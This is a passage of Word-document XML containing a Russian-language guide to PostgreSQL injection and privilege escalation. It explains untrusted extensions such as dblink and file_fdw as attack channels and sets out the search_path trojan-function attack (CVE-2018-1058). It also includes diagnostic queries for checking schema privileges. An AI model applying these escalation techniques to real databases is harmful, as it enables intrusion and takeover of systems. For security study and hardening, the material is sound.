          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">COPY PROGRAM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, кому-то — администратору или предыдущей цепочке — нужно явно выдать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Это не значит, что атака невозможна; это значит, что в первую очередь применимы каналы, не требующие специальных привилегий: UNION-based, error-based, blind, OOB через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(если расширение установлено и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">USAGE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> выдан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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">2.3 Расширения: trusted vs untrusted</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Расширения в PostgreSQL — это пакеты SQL-скриптов, функций и иногда C-кода, ставящиеся через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Поверхность атаки они меняют сильно: например,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превращает кластер из локально-замкнутого в способный делать исходящие TCP-коннекты,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даёт прямой shell как ОС-процесс postgres.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">До PG 13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требовал </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SUPERUSER</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для всех расширений без исключения. С </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PG 13</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> введено понятие trusted extension: расширения, помеченные </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">trusted = true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в control-файле, можно установить любому пользователю, имеющему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целевой БД. Untrusted — по-прежнему только суперюзер.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Из contrib-сборки PostgreSQL значительная часть расширений помечена как trusted — среди них и совершенно безобидные (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">hstore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citext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pgcrypto</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unaccent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">), и потенциально опасные при цепочке эскалации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в trusted-режиме, см. 3.7.2). Untrusted остаются те, что дают прямой доступ к ОС, сети или файловой системе. Канонический список для конкретного кластера — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_available_extensions</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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT name, default_version, trusted FROM pg_available_extensions ORDER BY trusted DESC, name;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Untrusted расширения, релевантные для инъекций:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pP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 TCP-коннекты к другим PostgreSQL (3.6.1).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pP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 foreign data wrapper, делает SSRF-каналы (3.6.2).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">file_fdw</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — чтение файлов как таблиц (родственник 3.6.3).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pP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 untrusted процедурные языки с прямым доступом к ОС (3.7.2, 3.7.3).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">adminpack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — устаревшее, давало </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_file_*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> функции для pgAdmin.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Ключевая тонкость: trust регулирует установку, а не использование. После того, как суперюзер выполнил </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE EXTENSION dblink</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, функции расширения становятся обычными SQL-функциями, на которые действуют обычные правила </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">GRANT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. По умолчанию </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">USAGE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> на установленные функции </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">dblink_*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> выдан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 то есть любой аутентифицированный пользователь может их вызывать. Это не баг и не недосмотр, это документированное поведение, но в моделировании угроз об этом часто забывают.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">2.4 search_path и схема public</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">search_path</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — это упорядоченный список схем, в которых PostgreSQL ищет объект, когда тот указан без явной квалификации (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">func()</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myschema.func()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">). Дефолтное значение — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">"$user", public</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Это значит: сначала ищется схема с именем текущего пользователя (если её нет — пропускается), затем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Механизм сам по себе нейтрален, но в сочетании с дефолтной привилегией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он давал многолетний канал эскалации, известный как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2018-1058 / search_path attack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Сценарий: атакующий с минимальными правами создаёт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функцию с именем, совпадающим с какой-нибудь стандартной — например, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">lower(text)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Когда суперюзер выполняет запрос, использующий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без квалификации, PostgreSQL разрешает имя через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">search_path</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Если порядок резолюции попадёт на функцию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(а это происходит, если её сигнатура «лучше» совпадает), будет выполнена пользовательская функция, причём от имени суперюзера. Дальше —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цепочки или прямой RCE.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">С </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PG 15</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> initdb по умолчанию делает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">REVOKE CREATE ON SCHEMA public FROM PUBLIC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Это закрывает классическую форму атаки: некому посадить trojan-функцию. Важный нюанс — изменение применяется только к новым кластерам. Кластеры, прошедшие через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_upgrade</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> с PG 14 или раньше, сохраняют старые привилегии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и атака на них работает.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Проверить состояние конкретного кластера можно двумя способами. Прямой булев ответ для произвольной роли:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT has_schema_privilege('public', 'public', 'CREATE');  -- роль PUBLIC, схема public, привилегия CREATE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Или через ACL в системном каталоге:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT nspname, nspacl FROM pg_namespace WHERE nspname = 'public';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">ACL-записи в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">nspacl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> имеют формат </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">grantee=privileges/grantor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Пустая строка до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означает роль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буквы между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коды привилегий (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">U</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — USAGE, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — CREATE,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 SELECT и т.д.); роль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кто выдал привилегию. Запись вида </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">=UC/postgres</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> означает «PUBLIC имеет USAGE и CREATE, выданные postgres» — на таком кластере CVE-2018-1058-class атаки работают.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Помимо этого изменения, search_path остаётся важным контекстом для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функций (см. 3.13.6) и для нескольких более узких CVE — CVE-2023-2454 с обходом через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
